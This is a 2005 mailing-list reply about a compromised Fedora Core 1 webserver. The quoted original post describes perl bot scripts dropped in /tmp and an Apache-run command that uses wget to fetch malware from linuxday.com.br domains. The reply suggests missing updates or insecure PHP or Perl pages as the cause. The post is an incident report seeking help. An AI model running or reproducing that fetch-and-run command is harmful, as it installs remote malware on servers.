Server compromissed

Bernd Radinger bradinger at gmail.com
Fri Feb 18 14:08:47 UTC 2005


On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul at topguncomputers.com
<paul at topguncomputers.com> wrote:
> Apparently someone has hacked into my webserver.  And is installing perl
> scripts into he /tmp/ directory.  There usually named .linuxday* or
> .cinta* and a few other names as well.
> 
> >From what I can tell something is causing apache to run a command like "sh
> wget  bot.linuxday.com.br -O {the above mentioned files are than listed}"
> 
> sometimes the site is worm.linuxday.com.br
> 
> I'm curious if anyone has heard about this before.  I'm currently running
> Fedora 1  with all the latests security patches.

fc1 has reached EOL some time ago, and only fedora legacy releases
additional updates for it. could be that you are vulnerable because
some fixes are missing. also could be that your web pages are
insecure. php or perl pages maybe?

-- 
Bernd




More information about the users mailing list